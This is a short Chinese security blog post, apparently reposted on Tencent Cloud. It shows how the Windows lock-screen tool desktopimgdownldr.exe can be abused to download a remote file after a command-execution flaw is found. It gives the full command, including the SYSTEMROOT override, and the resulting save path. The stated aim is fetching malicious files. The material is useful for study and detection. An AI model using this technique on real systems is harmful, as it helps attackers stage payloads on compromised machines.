首页
学习
活动
专区
圈层
工具
发布
社区首页 >专栏 >利用锁屏图片配置程序远程下载文件

利用锁屏图片配置程序远程下载文件

作者头像
信安之路
发布2025-11-21 14:32:28
发布2025-11-21 14:32:28
80
举报
文章被收录于专栏:信安之路信安之路

在发现一个 windows 系统命令执行漏洞时,如果想要远程下载一个恶意文件并执行时,那么就需要找可以通过命令行下载文件的方式,可以实现的方式有很多,比如通过执行 VBS 远程下载、利用 ftp 命令、利用 smb 服务等,Windows 系统下还有一些其他命令,今天分享的就是其中之一 Desktopimgdownldr,其功能是用于配置锁屏图片。

使用起来也很简单,准备好远程文件,我就拿图片作为案例,路径:

https://lupic.cdn.bcebos.com/20220708/3087044239_14_507_362.jpg

然后构造命令:

代码语言:javascript
复制
set "SYSTEMROOT=C:\Windows\Temp" && cmd /c desktopimgdownldr.exe /lockscreenurl:https://lupic.cdn.bcebos.com/20220708/3087044239_14_507_362.jpg /eventName:desktopimgdownldr

其中可以设置图片下载的路径,执行命令完成后:

image-20251022094214555
image-20251022094214555

图片将保存至:

C:\Windows\Temp\Personalization\LockScreenImage

image-20251022094151701
image-20251022094151701

今天的小技巧就分享到这里。

本文参与 腾讯云自媒体同步曝光计划,分享自微信公众号。
原始发表:2025-10-22,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 信安之路 微信公众号,前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档